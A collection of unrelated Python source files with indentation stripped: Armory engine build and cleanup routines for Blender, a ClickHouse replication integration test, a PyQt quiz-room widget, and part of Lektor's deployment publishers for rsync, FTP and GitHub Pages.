shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
exporter.execute(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.append('--shaderversion')
cmd.append('330')
cmd.append('--parallelAssetConversion')
cmd.append('4')
cmd.append('--to')
cmd.append(arm.utils.build_dir() + '/debug')
cmd.append('--nohaxe')
cmd.append('--noproject')
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Enabled':
cmd.append('--sound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Serialize krom.js into krom.bin
if wrd.arm_minify_js:
cwd = os.getcwd()
fp = files_path
if state.target == 'krom-macos':
fp += '/' + krom_exe + '/Contents/MacOS'
krom_exe = './Krom'
os.chdir(fp)
args = [krom_exe, '.', '.', '--writebin']
proc = subprocess.Popen(args)
proc.wait()
os.chdir(cwd)
os.remove(fp + '/krom.js')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
test.py
|
import time
import os
import threading
import random
from contextlib import contextmanager
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from helpers.client import CommandRequest
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1', config_dir='configs', with_zookeeper=True, macros={"layer": 0, "shard": 0, "replica": 1})
node2 = cluster.add_instance('node2', config_dir='configs', with_zookeeper=True, macros={"layer": 0, "shard": 0, "replica": 2})
nodes = [node1, node2]
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
pass
cluster.shutdown()
def test_random_inserts(started_cluster):
# Duration of the test, reduce it if don't want to wait
DURATION_SECONDS = 10# * 60
node1.query("""
CREATE TABLE simple ON CLUSTER test_cluster (date Date, i UInt32, s String)
ENGINE = ReplicatedMergeTree('/clickhouse/tables/{shard}/simple', '{replica}', date, i, 8192)""")
with PartitionManager() as pm_random_drops:
for sacrifice in nodes:
pass # This test doesn't work with partition problems still
#pm_random_drops._add_rule({'probability': 0.01, 'destination': sacrifice.ip_address, 'source_port': 2181, 'action': 'REJECT --reject-with tcp-reset'})
#pm_random_drops._add_rule({'probability': 0.01, 'source': sacrifice.ip_address, 'destination_port': 2181, 'action': 'REJECT --reject-with tcp-reset'})
min_timestamp = int(time.time())
max_timestamp = min_timestamp + DURATION_SECONDS
num_timestamps = max_timestamp - min_timestamp + 1
bash_script = os.path.join(os.path.dirname(__file__), "test.sh")
inserters = []
for node in nodes:
cmd = ['/bin/bash', bash_script, node.ip_address, str(min_timestamp), str(max_timestamp), str(cluster.get_client_cmd())]
inserters.append(CommandRequest(cmd, timeout=DURATION_SECONDS * 2, stdin=''))
print node.name, node.ip_address
for inserter in inserters:
inserter.get_answer()
answer="{}\t{}\t{}\t{}\n".format(num_timestamps, num_timestamps, min_timestamp, max_timestamp)
for node in nodes:
res = node.query_with_retry("SELECT count(), uniqExact(i), min(i), max(i) FROM simple", check_callback=lambda res: TSV(res) == TSV(answer))
assert TSV(res) == TSV(answer), node.name + " : " + node.query("SELECT groupArray(_part), i, count() AS c FROM simple GROUP BY i ORDER BY c DESC LIMIT 1")
node1.query("""DROP TABLE simple ON CLUSTER test_cluster""")
class Runner:
def __init__(self):
self.mtx = threading.Lock()
self.total_inserted = 0
self.inserted_vals = set()
self.inserted_payloads = set()
self.stop_ev = threading.Event()
def do_insert(self, thread_num):
self.stop_ev.wait(random.random())
year = 2000
month = '01'
day = str(thread_num + 1).zfill(2)
x = 1
while not self.stop_ev.is_set():
payload = """
{year}-{month}-{day} {x1}
{year}-{month}-{day} {x2}
""".format(year=year, month=month, day=day, x1=x, x2=(x + 1)).strip()
try:
random.choice(nodes).query("INSERT INTO repl_test FORMAT TSV", payload)
# print 'thread {}: insert {}, {}'.format(thread_num, i, i + 1)
self.mtx.acquire()
if payload not in self.inserted_payloads:
self.inserted_payloads.add(payload)
self.inserted_vals.add(x)
self.inserted_vals.add(x + 1)
self.total_inserted += 2 * x + 1
self.mtx.release()
except Exception, e:
print 'Exception:', e
x += 2
self.stop_ev.wait(0.1 + random.random() / 10)
def test_insert_multithreaded(started_cluster):
DURATION_SECONDS = 50
for node in nodes:
node.query("DROP TABLE IF EXISTS repl_test")
for node in nodes:
node.query("CREATE TABLE repl_test(d Date, x UInt32) ENGINE ReplicatedMergeTree('/clickhouse/tables/test/repl_test', '{replica}') ORDER BY x PARTITION BY toYYYYMM(d)")
runner = Runner()
threads = []
for thread_num in range(5):
threads.append(threading.Thread(target=runner.do_insert, args=(thread_num, )))
for t in threads:
t.start()
time.sleep(DURATION_SECONDS)
runner.stop_ev.set()
for t in threads:
t.join()
# Sanity check: at least something was inserted
assert runner.total_inserted > 0
all_replicated = False
for i in range(100): # wait for replication 50 seconds max
time.sleep(0.5)
def get_delay(node):
return int(node.query("SELECT absolute_delay FROM system.replicas WHERE table = 'repl_test'").rstrip())
if all([get_delay(n) == 0 for n in nodes]):
all_replicated = True
break
assert all_replicated
actual_inserted = []
for i, node in enumerate(nodes):
actual_inserted.append(int(node.query("SELECT sum(x) FROM repl_test").rstrip()))
assert actual_inserted[i] == runner.total_inserted
|
Salas.py
|
import os
import sys
from random import shuffle, choice
from threading import Thread, Timer
from PyQt5.QtCore import pyqtSignal, QObject
from PyQt5.QtGui import QPixmap, QIcon, QStandardItem, QStandardItemModel, QCloseEvent
from PyQt5.QtWidgets import QPushButton, QWidget, QVBoxLayout, QListWidget, QLabel, QApplication, QAction, qApp, \
QListWidgetItem, QListView, QHBoxLayout
class Sala(QListWidgetItem):
def __init__(self, uuid: int, users: int, max: int, segundos: int, artist: list, image: QPixmap = None,
target=None):
super().__init__()
self.segundos = segundos
self.max = max
self.users = users
self.artist = artist
self.image = image
self.sala = uuid
# Lamento esto pero no me dejo usar señales como tal.
self.signal = target
self.uptodate()
def trigger(self):
self.signal(self.sala)
def uptodate(self, users: int = None, max: int = None, segundos: int = None, artist: list = None,
image: QPixmap = None, **kwargs):
if users is not None:
self.users = users
if max is not None:
self.max = max
if segundos is not None:
self.segundos = segundos
if artist and isinstance(artist, list):
self.artist = artist
shuffle(self.artist)
while len(self.artist) < 2:
self.artist.append("")
if len(self.artist) > 2:
self.artist = self.artist[0:2]
self.setText(
"Users: {}/{} Time left: {}s artits: {}, {}".format(self.users, self.max, self.segundos, *self.artist))
if image and isinstance(image, QPixmap):
self.setIcon(QIcon(image))
class Salitas(QListWidget):
def __init__(self, parent=None, items=list()):
super().__init__(parent)
for item in items:
if isinstance(item, Sala):
self.addItem(item)
self.doubleClicked.connect(self.manager)
def manager(self):
self.currentItem().trigger()
class Room(QWidget):
messages = pyqtSignal(dict)
def __init__(self, room):
super().__init__()
self.room = room
self.flag = True
self.setGeometry(150, 150, 400, 500)
self.setMaximumSize(400, 500)
self.setMinimumSize(400, 500)
self.setWindowIcon(QIcon(os.getcwd() + os.sep + "IMGS" + os.sep + "start_icon.png"))
principal = QVBoxLayout()
header = QHBoxLayout()
botones = QVBoxLayout()
self.getter = Timer(function=self.messages.emit, args=({'status': 'game',
'option': 'getbuttons',
'room': self.room},), interval=1)
self.getter.start()
self.buttons = [QPushButton("artist", self) for i in range(4)]
for button in self.buttons:
botones.addWidget(button, stretch=1)
button.pressed.connect(self.emit_self)
self.header = QLabel("Time left:{}".format(20),self)
header.addWidget(self.header, stretch=1)
principal.addLayout(header, stretch=6)
principal.addLayout(botones, stretch=1)
self.setLayout(principal)
def emit_self(self):
button = self.sender()
if self.room and self.flag:
self.flag = False
self.messages.emit({"status": "answer", "room": int(self.room), "content": button.text()})
def set_buttons(self, buttons: list):
while len(buttons) < 4:
buttons.append(choice(buttons))
shuffle(buttons)
buttons = buttons[0:4]
i = 0
for button in self.buttons:
button.setText(buttons[i])
i += 1
def closeEvent(self, QCloseEvent):
self.getter.cancel()
self.messages.emit({"status": "leave"})
def receiver(self,rules: dict):
# Poner el cambio de flag y agregar cambios de color
if rules['status'] == 'answer_match':
for button in self.buttons:
if button.text() == rules['ans']:
if rules['succes']:
button.setObjectName("Correct")
self.header.setText("Correcto")
self.flag = True
else:
button.setObjectName("Incorrect")
self.flag = True
def console(target):
while True:
response = input("hi: ")
target.addItem(QListWidgetItem(response))
if __name__ == '__main__':
app = QApplication(sys.argv)
lista = Room(None)
lista.show()
console = Thread(target=console, args=(lista,), daemon=True)
console.start()
sys.exit(app.exec_())
|
publisher.py
|
import errno
import hashlib
import os
import posixpath
import select
import shutil
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from ftplib import Error as FTPError
from werkzeug import urls
from lektor._compat import (iteritems, iterkeys, range_type, string_types,
text_type, queue, BytesIO, StringIO, PY2)
from lektor.exception import LektorException
from lektor.utils import locate_executable, portable_popen
def _patch_git_env(env_overrides, ssh_command=None):
env = dict(os.environ)
env.update(env_overrides or ())
keys = [
('GIT_COMMITTER_NAME', 'GIT_AUTHOR_NAME', 'Lektor Bot'),
('GIT_COMMITTER_EMAIL', 'GIT_AUTHOR_EMAIL',
'bot@getlektor.com'),
]
for key_a, key_b, default in keys:
value_a = env.get(key_a)
value_b = env.get(key_b)
if value_a:
if not value_b:
env[key_b] = value_a
elif value_b:
if not value_a:
env[key_a] = value_b
else:
env[key_a] = default
env[key_b] = default
if ssh_command is not None and not env.get('GIT_SSH_COMMAND'):
env['GIT_SSH_COMMAND'] = ssh_command
return env
def _write_ssh_key_file(temp_fn, credentials):
if credentials:
key_file = credentials.get('key_file')
if key_file is not None:
return key_file
key = credentials.get('key')
if key:
parts = key.split(':', 1)
if len(parts) == 1:
kt = 'RSA'
else:
kt, key = parts
with open(temp_fn, 'w') as f:
f.write('-----BEGIN %s PRIVATE KEY-----\n' % kt.upper())
for x in range_type(0, len(key), 64):
f.write(key[x:x + 64] + '\n')
f.write('-----END %s PRIVATE KEY-----\n' % kt.upper())
os.chmod(temp_fn, 0o600)
return temp_fn
return None
def _get_ssh_cmd(port=None, keyfile=None):
ssh_args = []
if port:
ssh_args.append('-p %s' % port)
if keyfile:
ssh_args.append('-i "%s"' % keyfile)
return 'ssh %s' % ' '.join(ssh_args)
@contextmanager
def _temporary_folder(env):
base = env.temp_path
try:
os.makedirs(base)
except OSError:
pass
folder = tempfile.mkdtemp(prefix='.deploytemp', dir=base)
scratch = os.path.join(folder, 'scratch')
os.mkdir(scratch)
os.chmod(scratch, 0o755)
try:
yield scratch
finally:
try:
shutil.rmtree(folder)
except (IOError, OSError):
pass
class PublishError(LektorException):
"""Raised by publishers if something goes wrong."""
class Command(object):
def __init__(self, argline, cwd=None, env=None, capture=True,
silent=False):
environ = dict(os.environ)
if env:
environ.update(env)
kwargs = {'cwd': cwd, 'env': environ}
if silent:
self.devnull = open(os.devnull, 'rb+')
kwargs['stdout'] = self.devnull
kwargs['stderr'] = self.devnull
capture = False
if capture:
kwargs['stdout'] = subprocess.PIPE
kwargs['stderr'] = subprocess.PIPE
self.capture = capture
self._cmd = portable_popen(argline, **kwargs)
def wait(self):
returncode = self._cmd.wait()
if hasattr(self, "devnull"):
self.devnull.close()
return returncode
@property
def returncode(self):
return self._cmd.returncode
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self._cmd.wait()
def __iter__(self):
if not self.capture:
raise RuntimeError('Not capturing')
# Windows platforms do not have select() for files
if os.name == 'nt':
q = queue.Queue()
def reader(stream):
while 1:
line = stream.readline()
q.put(line)
if not line:
break
t1 = threading.Thread(target=reader, args=(self._cmd.stdout,))
t1.setDaemon(True)
t2 = threading.Thread(target=reader, args=(self._cmd.stderr,))
t2.setDaemon(True)
t1.start()
t2.start()
outstanding = 2
while outstanding:
item = q.get()
if not item:
outstanding -= 1
else:
yield item.rstrip().decode('utf-8', 'replace')
# Otherwise we can go with select()
else:
streams = [self._cmd.stdout, self._cmd.stderr]
while streams:
for l in select.select(streams, [], streams):
for stream in l:
line = stream.readline()
if not line:
if stream in streams:
streams.remove(stream)
break
yield line.rstrip().decode('utf-8', 'replace')
def safe_iter(self):
with self:
for line in self:
yield line
@property
def output(self):
return self.safe_iter()
class Publisher(object):
def __init__(self, env, output_path):
self.env = env
self.output_path = os.path.abspath(output_path)
def fail(self, message):
raise PublishError(message)
def publish(self, target_url, credentials=None, **extra):
raise NotImplementedError()
class RsyncPublisher(Publisher):
def get_command(self, target_url, tempdir, credentials):
credentials = credentials or {}
argline = ['rsync', '-rclzv', '--exclude=.lektor']
target = []
env = {}
keyfile = _write_ssh_key_file(os.path.join(
tempdir, 'ssh-auth-key'), credentials)
if target_url.port is not None or keyfile is not None:
argline.append('-e')
argline.append(_get_ssh_cmd(target_url.port, keyfile))
username = credentials.get('username') or target_url.username
if username:
target.append(username + '@')
target.append(target_url.ascii_host)
target.append(':' + target_url.path.rstrip('/') + '/')
argline.append(self.output_path.rstrip('/\\') + '/')
argline.append(''.join(target))
return Command(argline, env=env)
def publish(self, target_url, credentials=None, **extra):
with _temporary_folder(self.env) as tempdir:
client = self.get_command(target_url, tempdir, credentials)
with client:
for line in client:
yield line
class FtpConnection(object):
def __init__(self, url, credentials=None):
credentials = credentials or {}
self.con = self.make_connection()
self.url = url
self.username = credentials.get('username') or url.username
self.password = credentials.get('password') or url.password
self.log_buffer = []
self._known_folders = set()
def make_connection(self):
from ftplib import FTP
return FTP()
def drain_log(self):
log = self.log_buffer[:]
del self.log_buffer[:]
for chunk in log:
for line in chunk.splitlines():
if not isinstance(line, text_type):
line = line.decode('utf-8', 'replace')
yield line.rstrip()
def connect(self):
options = self.url.decode_query()
log = self.log_buffer
log.append('000 Connecting to server ...')
try:
log.append(self.con.connect(self.url.ascii_host,
self.url.port or 21))
except Exception as e:
log.append('000 Could not connect.')
log.append(str(e))
return False
try:
credentials = {}
if PY2:
if self.username:
credentials["user"] = self.username.encode('utf-8')
if self.password:
credentials["passwd"] = self.password.encode('utf-8')
else:
if self.username:
credentials["user"] = self.username
if self.password:
credentials["passwd"] = self.password
log.append(self.con.login(**credentials))
except Exception as e:
log.append('000 Could not authenticate.')
log.append(str(e))
return False
passive = options.get('passive') in ('on', 'yes', 'true', '1', None)
log.append('000 Using passive mode: %s' % (passive and 'yes' or 'no'))
self.con.set_pasv(passive)
try:
log.append(self.con.cwd(self.url.path))
except Exception as e:
log.append(str(e))
return False
log.append('000 Connected!')
return True
def mkdir(self, path, recursive=True):
if not isinstance(path, text_type):
path = path.decode('utf-8')
if path in self._known_folders:
return
dirname, basename = posixpath.split(path)
if dirname and recursive:
self.mkdir(dirname)
try:
self.con.mkd(path)
except FTPError as e:
msg = str(e)
if msg[:4] != '550 ':
self.log_buffer.append(str(e))
return
self._known_folders.add(path)
def append(self, filename, data):
if not isinstance(filename, text_type):
filename = filename.decode('utf-8')
if PY2:
input = StringIO(data)
else:
input = BytesIO(data.encode('utf-8'))
try:
self.con.storbinary('APPE ' + filename, input)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def get_file(self, filename, out=None):
if not isinstance(filename, text_type):
filename = filename.decode('utf-8')
getvalue = False
if out is None:
if PY2:
out = StringIO()
else:
out = BytesIO()
getvalue = True
try:
self.con.retrbinary('RETR ' + filename, out.write)
except FTPError as e:
msg = str(e)
if msg[:4] != '550 ':
self.log_buffer.append(e)
return None
if getvalue:
if PY2:
return out.getvalue()
return out.getvalue().decode('utf-8')
return out
def upload_file(self, filename, src, mkdir=False):
if isinstance(src, string_types):
if PY2:
src = StringIO(src)
else:
src = BytesIO(src.encode('utf-8'))
if mkdir:
directory = posixpath.dirname(filename)
if directory:
self.mkdir(directory, recursive=True)
if not isinstance(filename, text_type):
filename = filename.decode('utf-8')
try:
self.con.storbinary('STOR ' + filename, src,
blocksize=32768)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def rename_file(self, src, dst):
try:
self.con.rename(src, dst)
except FTPError as e:
self.log_buffer.append(str(e))
try:
self.con.delete(dst)
except Exception as e:
self.log_buffer.append(str(e))
try:
self.con.rename(src, dst)
except Exception as e:
self.log_buffer.append(str(e))
def delete_file(self, filename):
if isinstance(filename, text_type):
filename = filename.encode('utf-8')
try:
self.con.delete(filename)
except Exception as e:
self.log_buffer.append(str(e))
def delete_folder(self, filename):
if isinstance(filename, text_type):
filename = filename.encode('utf-8')
try:
self.con.rmd(filename)
except Exception as e:
self.log_buffer.append(str(e))
self._known_folders.discard(filename)
class FtpTlsConnection(FtpConnection):
def make_connection(self):
from ftplib import FTP_TLS
return FTP_TLS()
def connect(self):
connected = super(FtpTlsConnection, self).connect()
if connected:
# Upgrade data connection to TLS.
self.con.prot_p() # pylint: disable=no-member
return connected
class FtpPublisher(Publisher):
connection_class = FtpConnection
def read_existing_artifacts(self, con):
contents = con.get_file('.lektor/listing')
if not contents:
return {}, set()
duplicates = set()
rv = {}
# Later records override earlier ones. There can be duplicate
# entries if the file was not compressed.
for line in contents.splitlines():
items = line.split('|')
if len(items) == 2:
if not isinstance(items[0], text_type):
artifact_name = items[0].decode('utf-8')
else:
artifact_name = items[0]
if artifact_name in rv:
duplicates.add(artifact_name)
rv[artifact_name] = items[1]
return rv, duplicates
def iter_artifacts(self):
"""Iterates over all artifacts in the build folder and yields the
artifacts.
"""
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames
if not self.env.is_ignored_artifact(x)]
for filename in filenames:
if self.env.is_ignored_artifact(filename):
continue
full_path = os.path.join(self.output_path, dirpath, filename)
local_path = full_path[len(self.output_path):] \
.lstrip(os.path.sep)
if os.path.altsep:
local_path = local_path.lstrip(os.path.altsep)
h = hashlib.sha1()
try:
with open(full_path, 'rb') as f:
while 1:
item = f.read(4096)
if not item:
break
h.update(item)
except IOError as e:
if e.errno != errno.ENOENT:
raise
yield (
local_path.replace(os.path.sep, '/'),
full_path,
h.hexdigest(),
)
def get_temp_filename(self, filename):
dirname, basename = posixpath.split(filename)
return posixpath.join(dirname, '.' + basename + '.tmp')
def upload_artifact(self, con, artifact_name, source_file, checksum):
with open(source_file, 'rb') as source:
tmp_dst = self.get_temp_filename(artifact_name)
con.log_buffer.append('000 Updating %s' % artifact_name)
con.upload_file(tmp_dst, source, mkdir=True)
con.rename_file(tmp_dst, artifact_name)
con.append('.lektor/listing', '%s|%s\n' % (
artifact_name, checksum
))
def consolidate_listing(self, con, current_artifacts):
server_artifacts, duplicates = self.read_existing_artifacts(con)
known_folders = set()
for artifact_name in iterkeys(current_artifacts):
known_folders.add(posixpath.dirname(artifact_name))
for artifact_name, checksum in iteritems(server_artifacts):
if artifact_name not in current_artifacts:
con.log_buffer.append('000 Deleting %s' % artifact_name)
con.delete_file(artifact_name)
folder = posixpath.dirname(artifact_name)
if folder not in known_folders:
con.log_buffer.append('000 Deleting %s' % folder)
con.delete_folder(folder)
if duplicates or server_artifacts != current_artifacts:
listing = []
for artifact_name, checksum in iteritems(current_artifacts):
listing.append('%s|%s\n' % (artifact_name, checksum))
listing.sort()
con.upload_file('.lektor/.listing.tmp', ''.join(listing))
con.rename_file('.lektor/.listing.tmp', '.lektor/listing')
def publish(self, target_url, credentials=None, **extra):
con = self.connection_class(target_url, credentials)
connected = con.connect()
for event in con.drain_log():
yield event
if not connected:
return
yield '000 Reading server state ...'
con.mkdir('.lektor')
committed_artifacts, _ = self.read_existing_artifacts(con)
for event in con.drain_log():
yield event
yield '000 Begin sync ...'
current_artifacts = {}
for artifact_name, filename, checksum in self.iter_artifacts():
current_artifacts[artifact_name] = checksum
if checksum != committed_artifacts.get(artifact_name):
self.upload_artifact(con, artifact_name, filename, checksum)
for event in con.drain_log():
yield event
yield '000 Sync done!'
yield '000 Consolidating server state ...'
self.consolidate_listing(con, current_artifacts)
for event in con.drain_log():
yield event
yield '000 All done!'
class FtpTlsPublisher(FtpPublisher):
connection_class = FtpTlsConnection
class GithubPagesPublisher(Publisher):
def get_credentials(self, url, credentials=None):
credentials = credentials or {}
username = credentials.get('username') or url.username
password = credentials.get('password') or url.password
rv = username
if username and password:
rv += ':' + password
return rv if rv else None
def update_git_config(self, repo, url, branch, credentials=None):
ssh_command = None
path = url.host + u'/' + url.path.strip(u'/')
cred = None
if url.scheme in ('ghpages', 'ghpages+ssh'):
push_url = 'git@github.com:%s.git' % path
keyfile = _write_ssh_key_file(os.path.join(
repo, '.git', 'ssh-auth-key'), credentials)
if keyfile or url.port:
ssh_command = _get_ssh_cmd(url.port, keyfile)
else:
push_url = 'https://github.com/%s.git' % path
cred = self.get_credentials(url, credentials)
with open(os.path.join(repo, '.git', 'config'), 'a') as f:
f.write('[remote "origin"]\nurl = %s\n'
'fetch = +refs/heads/%s:refs/remotes/origin/%s\n' %
(push_url, branch, branch))
if cred:
cred_path = os.path.join(repo, '.git', 'credentials')
f.write('[credential]\nhelper = store --file "%s"\n' %
cred_path)
with open(cred_path, 'w') as cf:
cf.write('https://%s@github.com\n' % cred)
return ssh_command
def link_artifacts(self, path):
try:
link = os.link
except AttributeError:
link = shutil.copy
# Clean old
for filename in os.listdir(path):
if filename == '.git':
continue
filename = os.path.join(path, filename)
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename)
# Add new
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if x != '.lektor']
for filename in filenames:
full_path = os.path.join(self.output_path, dirpath, filename)
dst = os.path.join(path, full_path[len(self.output_path):]
.lstrip(os.path.sep)
.lstrip(os.path.altsep or ''))
try:
os.makedirs(os.path.dirname(dst))
except (OSError, IOError):
pass
try:
link(full_path, dst)
except OSError: # Different Filesystems
shutil.copy(full_path, dst)
def write_cname(self, path, target_url):
params = target_url.decode_query()
cname = params.get('cname')
if cname is not None:
with open(os.path.join(path, 'CNAME'), 'w') as f:
f.write('%s\n' % cname)
def detect_target_branch(self, target_url):
# When pushing to the username.github.io repo we need to push to
# master, otherwise to gh-pages
if (target_url.host.lower() + '.github.io' ==
target_url.path.strip('/').lower()):
branch = 'master'
else:
branch = 'gh-pages'
return branch
def publish(self, target_url, credentials=None, **extra):
if not locate_executable('git'):
self.fail('git executable not found; cannot deploy.')
branch = self.detect_target_branch(target_url)
with _temporary_folder(self.env) as path:
ssh_command = None
